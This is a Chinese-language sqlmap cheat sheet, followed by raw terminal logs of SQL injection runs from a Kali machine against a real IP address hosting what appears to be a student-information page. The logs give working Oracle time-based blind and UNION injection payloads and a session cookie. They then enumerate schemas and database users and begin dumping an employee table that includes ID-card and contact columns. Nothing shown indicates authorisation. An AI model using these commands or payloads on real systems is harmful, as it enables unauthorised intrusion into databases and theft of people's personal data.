sqlmap实例文档

sqlmap 手册参数整理文档

1、
--data
 sqlmap -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
2、SQLmap -u http://www.target.com/vuln.php" --data="id=1 --cookie="  "

3、sqlmap -u http://www.target.com/vuln.php" --data="id=1 --cookie="  --dbs

4、 SQLmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" --dump

5、 sqlmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" --dump -all

6、sqlmap   -u http://www.target.com/vuln.php" --data="id=1 --cookie=" -D+(数据库名)  --dump

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:48:22

[09:48:23] [INFO] resuming back-end DBMS 'oracle'
[09:48:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[09:48:23] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[09:48:23] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:48:23] [INFO] fetching database (schema) names
[09:48:23] [INFO] the SQL query used returns 27 entries
available databases [27]:                                                                                                                            
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC

[09:48:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS --users
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:02:24

[10:02:25] [INFO] resuming back-end DBMS 'oracle'
[10:02:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:02:25] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:02:25] [INFO] fetching database users
[10:02:25] [INFO] the SQL query used returns 34 entries
[10:02:25] [INFO] retrieved: ANONYMOUS
[10:02:25] [INFO] retrieved: CTXSYS
[10:02:26] [INFO] retrieved: DBSNMP
[10:02:26] [INFO] retrieved: GS_KS
[10:02:26] [INFO] retrieved: HR
[10:02:26] [INFO] retrieved: MDSYS
[10:02:26] [INFO] retrieved: ODM
[10:02:26] [INFO] retrieved: ODM_MTR
[10:02:26] [INFO] retrieved: OE
[10:02:26] [INFO] retrieved: OLAPSYS
[10:02:26] [INFO] retrieved: ORDPLUGINS
[10:02:26] [INFO] retrieved: ORDSYS
[10:02:27] [INFO] retrieved: OUTLN
[10:02:27] [INFO] retrieved: PM
[10:02:27] [INFO] retrieved: QS
[10:02:27] [INFO] retrieved: QS_ADM
[10:02:27] [INFO] retrieved: QS_CB
[10:02:27] [INFO] retrieved: QS_CBADM
[10:02:27] [INFO] retrieved: QS_CS
[10:02:27] [INFO] retrieved: QS_ES
[10:02:27] [INFO] retrieved: QS_OS
[10:02:27] [INFO] retrieved: QS_WS
[10:02:27] [INFO] retrieved: RMAN
[10:02:28] [INFO] retrieved: SCOTT
[10:02:28] [INFO] retrieved: SH
[10:02:28] [INFO] retrieved: SYS
[10:02:28] [INFO] retrieved: SYSTEM
[10:02:28] [INFO] retrieved: TESTDB
[10:02:28] [INFO] retrieved: WKPROXY
[10:02:28] [INFO] retrieved: WKSYS
[10:02:28] [INFO] retrieved: WMSYS
[10:02:28] [INFO] retrieved: XDB
[10:02:28] [INFO] retrieved: XDGSNEW
[10:02:28] [INFO] retrieved: YJSANDRBAC
database management system users [34]:                                                                                                               
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] GS_KS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC

[10:02:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'

[*] shutting down at 10:02:28

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS -T
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

Usage: python sqlmap [options]

sqlmap: error: -T option requires an argument
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS --T
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

Usage: python sqlmap [options]

sqlmap: error: no such option: --T
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:04:03

[10:04:04] [INFO] resuming back-end DBMS 'oracle'
[10:04:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:04:04] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:04:04] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:04:04] [INFO] fetching database (schema) names
[10:04:04] [INFO] the SQL query used returns 27 entries
available databases [27]:                                                                                                                            
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC

[10:04:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'

[*] shutting down at 10:04:04

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs --users
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:04:11

[10:04:12] [INFO] resuming back-end DBMS 'oracle'
[10:04:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:04:12] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:04:12] [INFO] fetching database users
[10:04:12] [INFO] the SQL query used returns 34 entries
database management system users [34]:                                                                                                               
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] GS_KS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC

[10:04:12] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:04:12] [INFO] fetching database (schema) names
[10:04:12] [INFO] the SQL query used returns 27 entries
available databases [27]:                                                                                                                            
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC

[10:04:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'

[*] shutting down at 10:04:12

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:05:02

[10:05:02] [INFO] setting file for logging HTTP traffic
[10:05:03] [INFO] resuming back-end DBMS 'oracle'
[10:05:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:05:03] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:05:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'

[*] shutting down at 10:05:03

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -f --banner -users
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:06:51

[10:07:06] [CRITICAL] host 'sers' does not exist

[*] shutting down at 10:07:06

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:43:00

[10:43:00] [INFO] resuming back-end DBMS 'oracle'
[10:43:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:43:01] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:43:01] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:43:01] [INFO] fetching database (schema) names
[10:43:01] [INFO] the SQL query used returns 27 entries
available databases [27]:                                           
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC

[10:43:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'

[*] shutting down at 10:43:01

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:44:45

[10:44:45] [INFO] resuming back-end DBMS 'oracle'
[10:44:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:44:46] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:44:46] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:44:46] [INFO] fetching current database
[10:44:46] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[10:44:46] [INFO] fetching tables for database: 'XDGSNEW'
[10:44:46] [INFO] the SQL query used returns 292 entries
[10:44:46] [INFO] fetching columns for table 'BASE_EMPLOYEE160920' in database 'XDGSNEW'                                                             
[10:44:46] [INFO] the SQL query used returns 20 entries
[10:44:46] [INFO] resumed: "EMPLOYEEID","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENO","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENAME","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENAME_EN","VARCHAR2"
[10:44:46] [INFO] resumed: "BORNDATE","DATE"
[10:44:46] [INFO] resumed: "GENDER","VARCHAR2"
[10:44:46] [INFO] resumed: "TECHNICTITLECODE","VARCHAR2"
[10:44:46] [INFO] resumed: "DUTY","VARCHAR2"
[10:44:46] [INFO] resumed: "CULTURELEVEL","VARCHAR2"
[10:44:46] [INFO] resumed: "DEGREE","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEETYPECODE","VARCHAR2"
[10:44:46] [INFO] resumed: "MENTORLEVEL","VARCHAR2"
[10:44:46] [INFO] resumed: "RESUME","VARCHAR2"
[10:44:46] [INFO] resumed: "EMAIL","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEEPHOTO","BLOB"
[10:44:46] [INFO] resumed: "IDCARDNO","VARCHAR2"
[10:44:46] [INFO] resumed: "DEPARTMENTCODE","VARCHAR2"
[10:44:46] [INFO] resumed: "CONTACTINFO","VARCHAR2"
[10:44:46] [INFO] resumed: "STATUS","VARCHAR2"
[10:44:46] [INFO] resumed: "SECTIONOFFICE","VARCHAR2"
[10:44:46] [INFO] fetching entries for table 'BASE_EMPLOYEE160920' in database 'XDGSNEW'                                                             
[10:44:46] [INFO] the SQL query used returns 1433 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[10:48:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'                     
[10:48:45] [INFO] fetching number of entries for table 'BASE_EMPLOYEE160920' in database 'XDGSNEW'
[10:48:45] [INFO] resumed: 1433
[10:48:45] [INFO] resumed:  
[10:48:45] [INFO] resumed:  
[10:48:45] [INFO] resumed:  
[10:48:45] [INFO] resumed: ??
[10:48:45] [INFO] resumed: 08
[10:48:45] [INFO] resumed:  
[10:48:45] [INFO] resumed:  
[10:48:45] [INFO] resumed: 06103010060710294427\x02A
[10:48:45] [INFO] resumed: ???
[10:48:45] [INFO] resumed:  
[10:48:45] [INFO] resumed: 200309118
[10:48:45] [INFO] resumed:  
[10:48:45] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
[10:50:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
^C
[10:52:03] [WARNING] Ctrl+C detected in dumping phase                                                                                                
Database: XDGSNEW
Table: BASE_EMPLOYEE160920
[1 entry]
+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+
